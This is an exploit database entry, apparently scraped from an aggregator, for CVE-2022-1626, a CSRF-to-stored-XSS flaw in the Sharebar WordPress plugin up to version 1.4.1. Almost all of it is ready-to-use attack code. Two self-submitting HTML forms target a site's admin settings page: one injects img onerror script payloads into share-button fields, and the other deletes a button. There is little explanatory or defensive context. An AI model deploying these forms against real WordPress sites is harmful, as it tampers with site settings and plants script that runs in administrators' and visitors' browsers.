Exploit for Sharebar <= 1.4.1 - Arbitrary Settings Update to Stored XSS via CSRF CVE-2022-1626

Name: Exploit for Sharebar <= 1.4.1 - Arbitrary Settings Update to Stored XSS via CSRF CVE-2022-1626
Rating: 5 (60 reviews)

2022-06-15 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:3D1F90D9-45DA-42F8-93F8-15C8A4FF90CA
<form id="test" action="https://example.com/wp-admin/options-general.php?page=Sharebar" method="POST">
    <input type="text" name="name" value="facebook">
    <input type="text" name="position" value="1">
    <input type="text" name="enabled" value="0">
    <input type="text" name="enabled" value="1">
    <input type="text" name="big" value="<a>test1</a><img src=x onerror=alert(/XSS/)>">
    <input type="text" name="small" value="<a>test2</a><img src=x onerror=alert(/XSS/)>">
    <input type="text" name="do" value="update">
    <input type="text" name="id" value="1">
    <input type="text" name="status" value="Share button has been updated.">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=Sharebar" method="POST">
    <input type="text" name="do" value="delete">
    <input type="text" name="id" value="5">
    <input type="text" name="status" value="Button has been deleted.">
</form>
<script>
    document.getElementById("test").submit();
</script>